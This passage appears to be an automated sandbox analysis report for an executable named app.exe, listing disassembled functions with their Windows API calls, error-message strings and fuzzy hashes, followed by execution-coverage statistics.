                                                                                                                                                                                                            • Instruction ID: 434fca1db0eb8eeaa6e981a799befbc9359c9f9f4119d795746091887b6bd426
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a85a650483ad60012865602343b5a273e15b3a1a81ddf8674274c6c15df3bc7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1819676E0E243A5F764AF25C900378F7A0AB11744FD78071EA09B72A5CF3DE9429322
                                                                                                                                                                                                            Function 00007FF7ACE8E048 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                            • Opcode ID: b915d9317e93b4a578d272aa80a630b017422358f6ab493f0d79254b27da14c1
                                                                                                                                                                                                            • Instruction ID: 6a65ee44a84865148c44e79060329bdd7d422fbcd3010fb657a6a4db0ae13e0d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b915d9317e93b4a578d272aa80a630b017422358f6ab493f0d79254b27da14c1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22619937A09B85DAEB10EF65D1803ADB7A0FB44B89F454225EF5D27BA8CB38E144C710
                                                                                                                                                                                                            Function 00007FF7ACE824D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                                                                            • Opcode ID: 87d498f1f2eba1085113bd965dcd85bf0b0aec07eea02affa6468b175f4c1a2f
                                                                                                                                                                                                            • Instruction ID: 54688023df1a5c8ef5f65a9dd7e5409e1e8225a684c3e4c95d09336f0d3bad67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87d498f1f2eba1085113bd965dcd85bf0b0aec07eea02affa6468b175f4c1a2f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D631617262E6C2A1E620F710E4517EAF3A4FB84785FC14035EA8D276A9DF3CD205CB50
                                                                                                                                                                                                            Function 00007FF7ACE83B80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE83BB1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                                                                            • Opcode ID: ecd9224541c82b8805659ffed1dacaf8541a9c5a4d14f69c88a104199cf53391
                                                                                                                                                                                                            • Instruction ID: 48750158458a96614d5e4ad0da3891a20209eeadcb22764970ab13a75f23468c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecd9224541c82b8805659ffed1dacaf8541a9c5a4d14f69c88a104199cf53391
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B701D870B1E3C2B4FA61B714D9063B5B281AF18786FC64031D80EA62B6EE5CE5548720
                                                                                                                                                                                                            Function 00007FF7ACE9B9A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                            • Opcode ID: 3b6644ee017022d719a3afab9fc978a5fba374dbb9fb0623c46dfb0064678277
                                                                                                                                                                                                            • Instruction ID: 0bb24d3905424621f0574adb71e9df40b1d22d97829220cc0c9f3cc5a7f53e67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b6644ee017022d719a3afab9fc978a5fba374dbb9fb0623c46dfb0064678277
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5D14932B0EA4199E720DF75D4402ECB7B1FB04798B8546B5EE5EA7BA9DE38D016C310
                                                                                                                                                                                                            Function 00007FF7ACE81F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                            • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                                            • Instruction ID: 58a65c6440307b1ad4e30c85d11bc672b32ab3fc8ef068a7c1a3a46b019d445e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B110031E1D18251F650A759E6452BDB292EF897C1FC98030E94917BBDCE3CD4D54710
                                                                                                                                                                                                            Function 00007FF7ACEA4C6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                            • Opcode ID: 0b8ca87835c30e7dd9a6d8efabbb9b2e46a436efc16959cb60937fa9fb99071e
                                                                                                                                                                                                            • Instruction ID: df0edf3654e27af19dbd32f42cc168342dc3c36f4d3584daece6ea33e66929a2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b8ca87835c30e7dd9a6d8efabbb9b2e46a436efc16959cb60937fa9fb99071e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79415732A0E2826AFB21AB25E401379D6D0EF807A5F995235EE5D17AF5DF3CD4418710
                                                                                                                                                                                                            Function 00007FF7ACE97D9C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACE97DCE
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: RtlFreeHeap.NTDLL(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7ACE8ADA5), ref: 00007FF7ACE97DEC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                            • API String ID: 3580290477-886552919
                                                                                                                                                                                                            • Opcode ID: 51e6a1df85e6b8727f5a5399446d791ce4e9a1b0ebf56f2411f665e3e6ab5c6a
                                                                                                                                                                                                            • Instruction ID: 7eda0af5dec47f78a8ca63ba6b7b682e21da23ab6636037a79b392ebdaa162c7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e6a1df85e6b8727f5a5399446d791ce4e9a1b0ebf56f2411f665e3e6ab5c6a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB419F32A0EB02E5EB15EF2598810BDE394EF457C4B964035F90E67BA5DF3CE8958360
                                                                                                                                                                                                            Function 00007FF7ACE9C038 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                            • Opcode ID: 25d3c82af5dee18dec41a6839be42a4efbc899a14913ea0c1072e724c64aea02
                                                                                                                                                                                                            • Instruction ID: 1f30f3a123a72f4e4e8273897a9b2be7270bb1773d402cb61e426f06f3f887d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25d3c82af5dee18dec41a6839be42a4efbc899a14913ea0c1072e724c64aea02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C641A232B1DA81A5DB20AF25E4443AAE661FB88784F954031EA4D977A8DF3CD441C750
                                                                                                                                                                                                            Function 00007FF7ACE9E438 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                            • Opcode ID: 337811278158943dc12376dc7550913df66d0a9835a82896272fb1d86e1f30b6
                                                                                                                                                                                                            • Instruction ID: 94ee1a951dfb319d97a8f1713dc2ececa86697bb39d86a66af79666253addb84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 337811278158943dc12376dc7550913df66d0a9835a82896272fb1d86e1f30b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7021D272A0D28192EB34AB15D04427DF3B1FB84B84FC68035E79D672A4DF7CE9458761
                                                                                                                                                                                                            Function 00007FF7ACE82770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                                                                            • Opcode ID: d8350b2dd45537fcb102945a95e56e5fec4cbfd54fbf68520de5e8d25681b826
                                                                                                                                                                                                            • Instruction ID: 9c3d92e197dfcc454b9a4380e5654ee6baf8d9b745810a057d7d445cf113829a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8350b2dd45537fcb102945a95e56e5fec4cbfd54fbf68520de5e8d25681b826
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7721C77272D781A1EB20A750F4507EAB364FB84789FC14035E68D676A5DF3CD205CB60
                                                                                                                                                                                                            Function 00007FF7ACE82880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Error detected
                                                                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                                                                            • Opcode ID: 06108ee8a0dfea952a12a3b0306062f889501f0bb9d520917d4d6b2389df326d
                                                                                                                                                                                                            • Instruction ID: 12d15899d12f0a8a7e3900465ef0c1572254326ffc9584af98d6fe2b4252f6e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06108ee8a0dfea952a12a3b0306062f889501f0bb9d520917d4d6b2389df326d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C221B27272D782A1EB20A750F4503EAB364FB84789FC15035EA8D676A9DF3CD205CB60
                                                                                                                                                                                                            Function 00007FF7ACE8EEE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                            • Opcode ID: 858846fea34555fb8d2c4f12b26bdb04a58b0d9f624c4d397e9619eb30fde2ff
                                                                                                                                                                                                            • Instruction ID: 8d85c9f7d9476b0639170df2c23d7d35ce3eb7369c336d506b5bdbc8223d4428
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 858846fea34555fb8d2c4f12b26bdb04a58b0d9f624c4d397e9619eb30fde2ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97118C3660DB8192EB219F15E500269B7A0FB88B85F9D4270EE8C17768DF3CC5618B10
                                                                                                                                                                                                            Function 00007FF7ACE9EF3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                            • Opcode ID: 4110ab54a1292af6c610fc14bebcfde478b3b42ba13f09fd81a5f0b3dffa68e3
                                                                                                                                                                                                            • Instruction ID: 4d71671faf30ffc65a265887edb7199b2c699ed85b22a12e0cc2efba0b7b364c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4110ab54a1292af6c610fc14bebcfde478b3b42ba13f09fd81a5f0b3dffa68e3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1601843191E642A6F730BF60946227EE390EF44744FC60536E65E676A5DF3CE504CA24

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:1%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                            Total number of Nodes:816
                                                                                                                                                                                                            Total number of Limit Nodes:29
